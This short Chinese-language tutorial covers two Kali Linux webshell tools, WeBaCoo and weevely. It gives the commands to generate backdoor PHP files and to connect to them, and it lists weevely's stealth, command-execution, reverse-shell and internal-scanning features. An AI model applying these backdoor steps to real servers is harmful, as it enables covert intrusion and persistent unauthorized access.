kali下生成木马的工具

这里简单介绍kali下的两款工具,时间比较仓促,简单的说下,后面再继续更新一些详细内容

一款小巧的php后门工具:WeBaCoo

全名:Web Backdoor Cookie

简介:kali已经集成,产生终端性shell,编码类型通过http头传输,隐蔽性比较强

优缺点:方便简单,适合作为临时shell,没有密码,只能用于php

使用方法:

生成服务端程序

 webacoo -g -o a.php
 

客户端连接:

webacoo -t -u http://127.0.0.1/a.php
 

连接的权限为当前服务器的权限,权限比较小,能做的事情很有限.

第二款:weevely

具有隐蔽性的类终端PHP webshell[拥有linux上的菜刀之称]

30多个强大的管理模块

可用于执行系统命令,浏览文件系统

检查服务器常见配置错误

创建正向,反向TCP Shell链接

通过目标主机代理HTTP流量

从目标主机运行端口扫描,进行内网渗透

可以设置密码,看了网上的很多文章提到了kali自带的weevely缺少pysockets库,而不能正常运行,需要安装其模块,可以用豆瓣源然后去安装

 https://pypi.doubanio.com/simple 

点击豆瓣源链接下载pysockets压缩包到本地,解压缩后执行下一条命令

./setup.py install

生成服务端程序:

 weevely generate 1.php

客户端连接:

weevely http://127.0.0.1/1.php

连接成功后,可以做的事情就多了,时间仓促,改日更